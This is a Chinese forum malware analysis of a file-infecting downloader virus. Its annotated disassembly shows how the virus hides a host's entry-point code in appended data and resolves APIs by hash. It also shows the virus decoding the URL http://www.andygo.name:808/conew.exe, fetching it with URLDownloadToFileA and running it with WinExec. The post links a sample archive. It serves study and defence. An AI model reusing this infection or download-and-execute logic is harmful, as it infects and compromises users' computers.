好友
阅读权限 40
听众
最后登录 1970-1-1
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子! 病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途! 禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 fzyr520 于 2010-8-21 17:26 编辑
前段时间看的一个抽入口点代码的病毒,这个比较简单,新手看看,老鸟就飞吧! 分析比较仓促,如有不对请指正!
vir.rar
(485.32 KB, 下载次数: 30)
解压密码 :123
1.首先是拿kernel32的地址,接着是获取一些API地址;
.text:00405AA1 push ebp
.text:00405AA2 mov ebp, esp
.text:00405AA4 sub esp, 20h
.text:00405AA7 push ebx
.text:00405AA8 push esi
.text:00405AA9 push edi
.text:00405AAA call GetKernel ; 拿kernel32的地址
.text:00405AAF mov esi, eax
.text:00405AB1 push 0A412FD89h
.text:00405AB6 push esi
.text:00405AB7 mov [ebp+var_14], esi
.text:00405ABA call GetApi ; Get LoadLibrary
.text:00405ABF push 2D6D019h
.text:00405AC4 push esi
.text:00405AC5 mov edi, eax
.text:00405AC7 call GetApi ; kernel32.LocalAlloc
.text:00405AC7 ;
2.病毒新分配了一块内存干活,所以前面的代码没什么可看的,我们直接调到他新开的一块内存
.text:00405BB9 mov eax, [ebp+var_14]
.text:00405BBC pop edi
.text:00405BBD pop esi
.text:00405BBE pop ebx
.text:00405BBF mov esp, ebp
.text:00405BC1 pop ebp
.text:00405BC2 push ecx
.text:00405BC3 call eax ; 此处执行分配内存的那段代码,
.text:00405BC3 ; 我已经从内存dump出来了。
3. 接着看dump的,还是先拿kernel32的地址
seg000:00156018 push ebp
seg000:00156019 mov ebp, esp
seg000:0015601B sub esp, 1B0h
seg000:00156021 push ebx
seg000:00156022 push esi
seg000:00156023 push edi
seg000:00156024 call sub_155FA8
seg000:00156029 mov [ebp-18Ch], eax
seg000:0015602F lea eax, [ebp-120h]
seg000:00156035 mov [ebp-184h], eax
seg000:0015603B mov dword ptr [ebp-180h], 0A412FD89h
seg000:00156045 lea ecx, [ebp-1B0h]
seg000:0015604B mov [ebp-17Ch], ecx
seg000:00156051 mov dword ptr [ebp-178h], 60F43F1Bh
seg000:0015605B lea edx, [ebp-194h]
seg000:00156061 mov [ebp-174h], edx
seg000:00156067 mov dword ptr [ebp-170h], 38C62A7Ah
seg000:00156071 lea eax, [ebp-190h]
seg000:00156077 mov [ebp-16Ch], eax
seg000:0015607D mov dword ptr [ebp-168h], 9554EFE7h
seg000:00156087 lea ecx, [ebp-188h]
seg000:0015608D mov [ebp-164h], ecx
seg000:00156093 mov dword ptr [ebp-160h], 0A9D1FD70h
seg000:0015609D lea edx, [ebp-11Ch]
seg000:001560A3 mov [ebp-15Ch], edx
seg000:001560A9 mov dword ptr [ebp-158h], 0BE25545h
seg000:001560B3 lea eax, [ebp-0Ch]
seg000:001560B6 mov [ebp-154h], eax
seg000:001560BC mov dword ptr [ebp-150h], 2D6D019h
seg000:001560C6 lea ecx, [ebp-1A0h]
seg000:001560CC mov [ebp-14Ch], ecx
seg000:001560D2 mov dword ptr [ebp-148h], 0C5FF2F46h
seg000:001560DC lea edx, [ebp-14h]
seg000:001560DF mov [ebp-144h], edx
seg000:001560E5 mov dword ptr [ebp-140h], 0C0D6D616h
seg000:001560EF lea eax, [ebp-128h]
seg000:001560F5 mov [ebp-13Ch], eax
seg000:001560FB mov dword ptr [ebp-138h], 405AD3CDh
seg000:00156105 lea ecx, [ebp-19Ch]
seg000:0015610B mov [ebp-134h], ecx
seg000:00156111 mov dword ptr [ebp-130h], 0C6387EB5h
seg000:0015611B call GetKernel32Address ; 获取kernel32的地址
4. 拿到了kernel32的地址接着就拿api了,一共11个;
seg000:0015613E loc_15613E: ; CODE XREF: seg000:0015612Dj
seg000:0015613E cmp dword ptr [ebp-12Ch], 0Bh
seg000:00156145 jnb short loc_156177
seg000:00156147 nop
seg000:00156148 nop
seg000:00156149 nop
seg000:0015614A nop
seg000:0015614B nop
seg000:0015614C nop
seg000:0015614D nop
seg000:0015614E nop
seg000:0015614F mov eax, [ebp-12Ch]
seg000:00156155 mov ecx, [ebp+eax*8-180h]
seg000:0015615C push ecx
seg000:0015615D mov edx, [ebp-8]
seg000:00156160 push edx
seg000:00156161 call GetApi ; fun(address,libname) 获取api
seg000:00156161 ; LoadLibraryA
seg000:00156161 ; GetModuleFileNameA
seg000:00156161 ; GreateFileA
seg000:00156161 ; GetFileSize
seg000:00156161 ; SetFilePointer
seg000:00156161 ; ReadFile
seg000:00156161 ; LocalAlloc
seg000:00156161 ; VirtualProtect
seg000:00156161 ; CloseHandle
seg000:00156161 ; LocalFree
seg000:00156161 ; CreateThread
5.现在开始恢复入口点代码
seg000:00156177 loc_156177: ; CODE XREF: seg000:00156145j
seg000:00156177 push 104h
seg000:0015617C lea eax, [ebp-118h]
seg000:00156182 push eax
seg000:00156183 push 0
seg000:00156185 call dword ptr [ebp-1B0h] ; GetModuleFileNameA
seg000:0015618B push 0
seg000:0015618D push 0
seg000:0015618F push 4 ; OPEN_ALWAYS
seg000:00156191 push 0
seg000:00156193 push 1
seg000:00156195 push 80000000h
seg000:0015619A lea ecx, [ebp-118h]
seg000:001561A0 push ecx
seg000:001561A1 call dword ptr [ebp-194h] ; CreateFileA 打开文件
seg000:001561A7 mov [ebp-1ACh], eax
seg000:001561AD mov edx, 1000ACD0h
seg000:001561B2 sub edx, 1000A590h
seg000:001561B8 add edx, 218h
seg000:001561BE mov [ebp-124h], edx
seg000:001561C4 lea eax, [ebp-198h]
seg000:001561CA push eax
seg000:001561CB mov ecx, [ebp-1ACh]
seg000:001561D1 push ecx
seg000:001561D2 call dword ptr [ebp-190h] ; GetFileSize 获取文件大小
seg000:001561D8 mov [ebp-10h], eax
seg000:001561DB push 2
seg000:001561DD push 0
seg000:001561DF mov edx, 1000ACD0h
seg000:001561E4 sub edx, 1000A590h
seg000:001561EA add edx, 218h
seg000:001561F0 neg edx
seg000:001561F2 push edx
seg000:001561F3 mov eax, [ebp-1ACh]
seg000:001561F9 push eax
seg000:001561FA call dword ptr [ebp-188h] ; SetFilePointer 把指针移动到文件尾部
seg000:001561FA ; 实际是上要取附加数据,
seg000:001561FA ; 正常入口点的代码被抽到附加数据了
seg000:00156200 mov ecx, 1000ACD0h
seg000:00156205 sub ecx, 1000A590h
seg000:0015620B add ecx, 218h ; 740 + 218 =958 这个是附加数据大小分为三部分
seg000:0015620B ; 1.正常程序入口点代码740
seg000:0015620B ; 2.加密网址104
seg000:0015620B ; 3.名称114
seg000:00156211 push ecx
seg000:00156212 push 40h ; '@'
seg000:00156214 call dword ptr [ebp-0Ch] ; LocalAlloc
seg000:00156217 mov [ebp-1A8h], eax
seg000:0015621D push 0
seg000:0015621F lea edx, [ebp-124h]
seg000:00156225 push edx
seg000:00156226 mov eax, [ebp-124h]
seg000:0015622C push eax
seg000:0015622D mov ecx, [ebp-1A8h]
seg000:00156233 push ecx ; ecx=00156510
seg000:00156233 ;
seg000:00156234 mov edx, [ebp-1ACh]
seg000:0015623A push edx
seg000:0015623B call dword ptr [ebp-11Ch] ; ReadFile
seg000:00156241 lea eax, [ebp-1A4h]
seg000:00156247 push eax
seg000:00156248 push 40h ; '@' ; PAGE_EXECUTE_READWRITE
seg000:0015624A mov ecx, 1000ACD0h
seg000:0015624F sub ecx, 1000A590h
seg000:00156255 push ecx ; 740
seg000:00156256 mov edx, [ebp+8]
seg000:00156259 push edx ; ebp+8 入口点
seg000:00156259 ;
seg000:0015625A call dword ptr [ebp-1A0h] ; kernel32.VirtualProtect
seg000:00156260 mov ecx, 1000ACD0h
seg000:00156265 sub ecx, 1000A590h
seg000:0015626B mov esi, [ebp-1A8h] ; 读出来的附加数据
seg000:00156271 mov edi, [ebp+8] ; 入口点edi
seg000:00156274 mov eax, ecx
seg000:00156276 shr ecx, 2
seg000:00156279 rep movsd ; 把正常入口点代码拷回入口点
seg000:0015627B mov ecx, eax
seg000:0015627D and ecx, 3
seg000:00156280 rep movsb
seg000:00156282 mov ecx, [ebp-1ACh]
seg000:00156288 push ecx
seg000:00156289 call dword ptr [ebp-14h] ; kernel32.CloseHandle
6.在创建一个线程干坏事
seg000:001562A1 push 0
seg000:001562A3 push 0
seg000:001562A5 mov eax, [ebp-4]
seg000:001562A8 push eax
seg000:001562A9 mov ecx, 1000AAA0h
seg000:001562AE add ecx, [ebp-18Ch]
seg000:001562B4 push ecx
seg000:001562B5 push 0
seg000:001562B7 push 0
seg000:001562B9 call dword ptr [ebp-19Ch] ; CreateThread
7.线程代码如下,就是个下载者。
seg000:001562D8 push ebp
seg000:001562D9 mov ebp, esp
seg000:001562DB sub esp, 348h
seg000:001562E1 push ebx
seg000:001562E2 push esi
seg000:001562E3 push edi
seg000:001562E4 call sub_155FA8
seg000:001562E9 mov edi, [ebp+8]
seg000:001562EC push 104h
seg000:001562F1 push edi
seg000:001562F2 call decode ; 解密网址 http://www.andygo.name:808/conew.exe
seg000:001562F7 add edi, 114h
seg000:001562FD push 104h
seg000:00156302 push edi
seg000:00156303 call decode ; brpcss.dll
seg000:00156308 add esp, 10h
seg000:0015630B call GetKernel32Address
seg000:00156310 mov ebx, eax
seg000:00156312 push 0A412FD89h
seg000:00156317 push ebx
seg000:00156318 call GetApi
seg000:0015631D mov [ebp-34h], eax ; LoadLibarayA
seg000:0015631D ;
seg000:00156320 nop
seg000:00156321 nop
seg000:00156322 mov byte ptr [ebp-0Ch], 73h ; 's'
seg000:00156326 mov byte ptr [ebp-0Bh], 68h ; 'h'
seg000:0015632A mov byte ptr [ebp-0Ah], 6Ch ; 'l'
seg000:0015632E mov byte ptr [ebp-9], 77h ; 'w'
seg000:00156332 mov byte ptr [ebp-8], 0
seg000:00156336 mov byte ptr [ebp-7], 0
seg000:0015633A mov byte ptr [ebp-6], 69h ; 'i'
seg000:0015633E mov byte ptr [ebp-5], 2Eh ; '.'
seg000:00156342 mov byte ptr [ebp-4], 64h ; 'd'
seg000:00156346 mov byte ptr [ebp-3], 6Ch ; 'l'
seg000:0015634A mov byte ptr [ebp-2], 6Ch ; 'l'
seg000:0015634E mov byte ptr [ebp-1], 0
seg000:00156352 nop
seg000:00156353 nop
seg000:00156354 lea ecx, [ebp-0Ch]
seg000:00156357 mov byte ptr [ebp-8], 61h ; 'a'
seg000:0015635B push ecx
seg000:0015635C mov byte ptr [ebp-7], 70h ; 'p'
seg000:00156360 call eax
seg000:00156362 push 0A98F1FDBh
seg000:00156367 push eax
seg000:00156368 call GetApi ; shlwapi.PathFileExistA
seg000:0015636D push 1475BB1Ah
seg000:00156372 push ebx
seg000:00156373 mov [ebp-38h], eax
seg000:00156376 call GetApi ; Kernel32.GetSystemDirectoryA
seg000:0015637B lea edx, [ebp-30h]
seg000:0015637E mov esi, eax
seg000:00156380 push edx
seg000:00156381 mov byte ptr [ebp-30h], 75h ; 'u'
seg000:00156385 mov byte ptr [ebp-2Fh], 73h ; 's'
seg000:00156389 mov byte ptr [ebp-2Eh], 65h ; 'e'
seg000:0015638D mov byte ptr [ebp-2Dh], 72h ; 'r'
seg000:00156391 mov byte ptr [ebp-2Ch], 33h ; '3'
seg000:00156395 mov byte ptr [ebp-2Bh], 32h ; '2'
seg000:00156399 mov byte ptr [ebp-2Ah], 2Eh ; '.'
seg000:0015639D mov byte ptr [ebp-29h], 64h ; 'd'
seg000:001563A1 mov byte ptr [ebp-28h], 6Ch ; 'l'
seg000:001563A5 mov byte ptr [ebp-27h], 6Ch ; 'l'
seg000:001563A9 mov byte ptr [ebp-26h], 0
seg000:001563AD call dword ptr [ebp-34h] ; LoadLibraryA
seg000:001563B0 push 789F5271h
seg000:001563B5 push eax
seg000:001563B6 call GetApi
seg000:001563BB mov [ebp-3Ch], eax ; user32.wsprintfA
seg000:001563BE lea eax, [ebp-140h]
seg000:001563C4 push 104h
seg000:001563C9 push eax
seg000:001563CA call esi ; GetSystemDirectoryA
seg000:001563CA ;
seg000:001563CC or ecx, 0FFFFFFFFh
seg000:001563CF xor eax, eax
seg000:001563D1 repne scasb
seg000:001563D3 not ecx
seg000:001563D5 sub edi, ecx
seg000:001563D7 lea edx, [ebp-140h]
seg000:001563DD mov esi, edi
seg000:001563DF mov edi, edx
seg000:001563E1 mov edx, ecx
seg000:001563E3 or ecx, 0FFFFFFFFh
seg000:001563E6 repne scasb
seg000:001563E8 dec edi
seg000:001563E9 mov ecx, edx
seg000:001563EB shr ecx, 2
seg000:001563EE rep movsd
seg000:001563F0 mov ecx, edx
seg000:001563F2 lea eax, [ebp-140h]
seg000:001563F8 and ecx, 3
seg000:001563FB push eax
seg000:001563FC rep movsb
seg000:001563FE call dword ptr [ebp-38h] ; shlwapi.PathFileExistsA
seg000:00156401 test eax, eax
seg000:00156403 jnz loc_1564FB
seg000:00156409 push 16EF74Bh
seg000:0015640E push ebx
seg000:0015640F mov byte ptr [ebp-18h], 75h ; 'u'
seg000:00156413 mov byte ptr [ebp-17h], 72h ; 'r'
seg000:00156417 mov byte ptr [ebp-16h], 6Ch ; 'l'
seg000:0015641B mov byte ptr [ebp-15h], 6Dh ; 'm'
seg000:0015641F mov byte ptr [ebp-14h], 6Fh ; 'o'
seg000:00156423 mov byte ptr [ebp-13h], 6Eh ; 'n'
seg000:00156427 mov byte ptr [ebp-12h], 2Eh ; '.'
seg000:0015642B mov byte ptr [ebp-11h], 64h ; 'd'
seg000:0015642F mov byte ptr [ebp-10h], 6Ch ; 'l'
seg000:00156433 mov byte ptr [ebp-0Fh], 6Ch ; 'l'
seg000:00156437 mov [ebp-0Eh], al
seg000:0015643A call GetApi
seg000:0015643F mov edi, eax ; Kernel32.Winexec
seg000:00156441 mov eax, 16118A5Dh
seg000:00156446 mov [esp-800h], eax
seg000:0015644D lea ecx, [ebp-18h]
seg000:00156450 push ecx
seg000:00156451 call dword ptr [ebp-34h] ; LoadLibraryA
seg000:00156454 mov [ebp-34h], eax
seg000:00156457 mov eax, [esp-800h]
seg000:0015645E mov [ebp-38h], eax
seg000:00156461 cmp dword ptr [ebp-38h], 16118A5Dh
seg000:00156468 jz loc_1564FB
seg000:0015646E push 0B929DC95h
seg000:00156473 push ebx
seg000:00156474 call GetApi ; GetTempPath
seg000:00156479 mov edx, [ebp-34h]
seg000:0015647C push 16118A5Dh
seg000:00156481 push edx
seg000:00156482 mov esi, eax
seg000:00156484 call GetApi
seg000:00156489 mov ebx, eax ; URLDownLoadToFileA
seg000:0015648B lea eax, [ebp-348h]
seg000:00156491 push eax
seg000:00156492 push 104h
seg000:00156497 mov byte ptr [ebp-24h], 25h ; '%'
seg000:0015649B mov byte ptr [ebp-23h], 73h ; 's'
seg000:0015649F mov byte ptr [ebp-22h], 7Eh ; '~'
seg000:001564A3 mov byte ptr [ebp-21h], 31h ; '1'
seg000:001564A7 mov byte ptr [ebp-20h], 39h ; '9'
seg000:001564AB mov byte ptr [ebp-1Fh], 38h ; '8'
seg000:001564AF mov byte ptr [ebp-1Eh], 2Eh ; '.'
seg000:001564B3 mov byte ptr [ebp-1Dh], 65h ; 'e'
seg000:001564B7 mov byte ptr [ebp-1Ch], 78h ; 'x'
seg000:001564BB mov byte ptr [ebp-1Bh], 65h ; 'e'
seg000:001564BF mov byte ptr [ebp-1Ah], 0
seg000:001564C3 call esi ; GetTempPath
seg000:001564C5 lea ecx, [ebp-348h]
seg000:001564CB lea edx, [ebp-24h]
seg000:001564CE push ecx
seg000:001564CF lea eax, [ebp-244h]
seg000:001564D5 push edx
seg000:001564D6 push eax
seg000:001564D7 call dword ptr [ebp-3Ch] ; user32.wsprintfA
seg000:001564DA mov edx, [ebp+8] ; "http://www.andygo.name:808/conew.exe"
seg000:001564DD add esp, 0Ch
seg000:001564E0 lea ecx, [ebp-244h]
seg000:001564E6 push 0
seg000:001564E8 push 0
seg000:001564EA push ecx
seg000:001564EB push edx
seg000:001564EC push 0
seg000:001564EE call ebx ; urlmon.URLDownloadToFileA
seg000:001564F0 lea eax, [ebp-244h]
seg000:001564F6 push 5
seg000:001564F8 push eax
seg000:001564F9 call edi ; Winexec 执行病毒
8.执行完毕后再次跳回入口点执行程序,由于入口点代码已经恢复了,这次运行的是正常程序了
seg000:001562BF mov eax, [ebp+8]
seg000:001562C2 pop edi
seg000:001562C3 pop esi
seg000:001562C4 pop ebx
seg000:001562C5 mov esp, ebp
seg000:001562C7 pop ebp
seg000:001562C8 add esp, 8
seg000:001562CB jmp eax ;执行正常程序